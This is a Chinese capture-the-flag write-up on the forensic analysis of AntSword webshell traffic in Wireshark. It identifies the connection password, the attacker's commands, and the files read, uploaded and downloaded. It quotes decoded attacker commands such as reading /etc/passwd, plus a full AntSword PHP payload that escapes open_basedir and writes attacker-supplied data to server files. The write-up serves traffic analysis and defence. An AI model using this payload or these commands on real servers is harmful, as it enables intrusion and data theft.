流量特征分析-蚁剑流量分析
任务:https://i-blog.csdnimg.cn/img_convert/66099b90ddfc3e7f5efd4861ae737d38.png
木马的连接密码是多少
这是分析蚁剑流量,可能是网站的,wireshark过滤http
https://i-blog.csdnimg.cn/img_convert/1ca913430d32c67e625b2b7a34e48185.png
追踪流http得到https://i-blog.csdnimg.cn/img_convert/95ca0a7b84ddca0ba0bd15ec78d27ad5.png
1就是连接密码
flag{1}
黑客执行的第一个下令是什么
https://i-blog.csdnimg.cn/img_convert/1d0847b90ae2457f224f72e776185919.png
取末了的执行下令。base64解密得
https://i-blog.csdnimg.cn/img_convert/101827254d7297b433f8f6f5cae0cf7c.png
除了id不是蚁剑自带的下令,其他的都是,所以
flag{id}
黑客读取了哪个文件的内容,提交文件绝对路径
依次读取不同的流。
https://i-blog.csdnimg.cn/img_convert/945c4ae2a5f26a51b81fa0d626a46f74.png
读到第二个流的时候。
https://i-blog.csdnimg.cn/img_convert/8c169bf03264747d764a3c217388a3db.png
读取了/etc/passwd
flag{/etc/passwd}
黑客上传了什么文件到服务器,提交文件名
将6个蚁剑webshell木马的请求内容全部解码,得到:
0、cd "/var/www/html";id;echo e124bc;pwd;echo 43523
1、cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
2、cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523
3、/var/www/html/flag.txt
4、/var/www/html/
5、/var/www/html/config.php
此中第1个请求和第4个请求都是打印文件清单,因此可通过对比两个文件清单的差异,来判定黑客增删的文件。
https://i-blog.csdnimg.cn/img_convert/b791b797d82fc3bcece66a19f5c39665.pnghttps://i-blog.csdnimg.cn/img_convert/138dbd9d5d6eefd1c3a69144c56ce153.png
发现多了个flag.txt文件。
黑客上传的文件内容是什么
第三个估计就是上传东西到flag.txt内里,所以进行url解码。url解码之后进行js美化
https://i-blog.csdnimg.cn/img_convert/cd95e59c1d78236bd3d8d5976e9b1ee0.png
1 = @ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
$ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr = preg_split(base64_decode("Lzt8Oi8="), $opdir);
@array_push($oparr, $ocwd, sys_get_temp_dir());
foreach($oparr as $item) {
if (!@is_writable($item)) {
continue;
};
$tmdir = $item.
"/.368479785";
@mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
$tmdir = realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr = @preg_split("/\\\\|\//", $tmdir);
for ($i = 0; $i < sizeof($cntarr); $i++) {
@chdir("..");
};
@ini_set("open_basedir", "/");
@rmdir($tmdir);
break;
};
};;
function asenc($out) {
return $out;
};
function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "6960".
"cb205";
echo @asenc($output);
echo "1e0a".
"91914";
}
ob_start();
try {
$f = base64_decode(substr($_POST["t41ffbc5fb0c04"], 2));
$c = $_POST["ld807e7193493d"];
$c = str_replace("\r", "", $c);
$c = str_replace("\n", "", $c);
$buf = "";
for ($i = 0; $i < strlen($c); $i += 2) $buf. = urldecode("%".substr($c, $i, 2));
echo(@fwrite(fopen($f, "a"), $buf) ? "1" : "0");;
} catch (Exception $e) {
echo "ERROR://".$e - > getMessage();
};
asoutput();
die(); & ld807e7193493d = 666 C61677B77726974655F666C61677D0A & t41ffbc5fb0c04 = 0 ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA ==
ld807e7193493d = 666 C61677B77726974655F666C61677D0A & t41ffbc5fb0c04 = 0 ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA ==
末了那行拿出来解码
https://i-blog.csdnimg.cn/img_convert/e405cb930154f32f3b20ee43890ea40d.png
https://i-blog.csdnimg.cn/img_convert/fe9656309721d4de04240016e0017491.png
得出上传的内容是:
flag{write_flag}
黑客下载了哪个文件,提交文件绝对路径
第四点的时候我们已经得出黑客下载了config.php文件
https://i-blog.csdnimg.cn/img_convert/31c79a7ff96ea3ed151fc969fc494154.png
flag{/var/www/html/config.php}
总结-蚁剑显着流量特征
1、利用URL编解码;
2、每个数据包前面都会包含@ini_set(“display_errors”, “0”);@set_time_limit(0);这两个语句;
3、相应包都是明文。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]